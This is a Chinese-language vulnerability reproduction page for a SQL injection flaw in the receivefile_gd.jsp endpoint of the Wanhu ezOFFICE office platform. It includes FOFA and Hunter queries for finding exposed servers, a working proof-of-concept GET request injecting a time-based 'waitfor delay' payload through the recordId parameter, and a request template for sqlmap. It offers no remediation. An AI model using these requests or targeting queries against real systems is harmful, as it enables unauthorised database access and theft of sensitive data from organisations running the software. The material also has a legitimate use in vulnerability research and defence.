登录 白背景

万户协同办公平台receivefile_gd.jsp存在SQL注入漏洞

一、漏洞简介

万户ezOFFICE协同管理平台是一个综合信息基础应用平台。 万户协同办公平台receivefile_gd.jsp存在SQL注入漏洞,<font style="color:rgb(62, 62, 62);">攻击者通过发送特殊的请求包可以对数据库进行SQL注入,获取服务器敏感信息。</font>

<font style="color:rgb(62, 62, 62);">二、影响版本</font>

  • <font style="color:rgb(62, 62, 62);">万户ezoffice</font>

<font style="color:rgb(62, 62, 62);">三、资产测绘</font>

  • <font style="color:rgb(62, 62, 62);">hunter</font><font style="color:rgb(62, 62, 62);">app.name="万户 Ezoffice OA"</font>
  • <font style="color:rgb(62, 62, 62);">fofa </font><font style="color:rgb(62, 62, 62);">app="万户ezOFFICE协同管理平台"</font>
  • <font style="color:rgb(62, 62, 62);">登录页面</font>

1694241158110-8d4eef16-79f1-46eb-899b-344bd2a7a19f.png

<font style="color:rgb(62, 62, 62);">四、漏洞复现</font>

GET /defaultroot/modules/govoffice/gov_documentmanager/receivefile_gd.jsp;.js?recordId=221;waitfor+delay+'0:0:5'--+- HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Connection: close

1724224816210-f9751be4-af21-4b50-800e-5b84b534bdc9.png

sqlmap

GET /defaultroot/modules/govoffice/gov_documentmanager/receivefile_gd.jsp;.js?recordId=221 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Connection: close

1724224913595-5c4bfbbd-30b8-4926-bd0c-5dbc1409521a.png

原文: https://www.yuque.com/xiaokp7/ocvun2/kng4ftg6utqk6yvr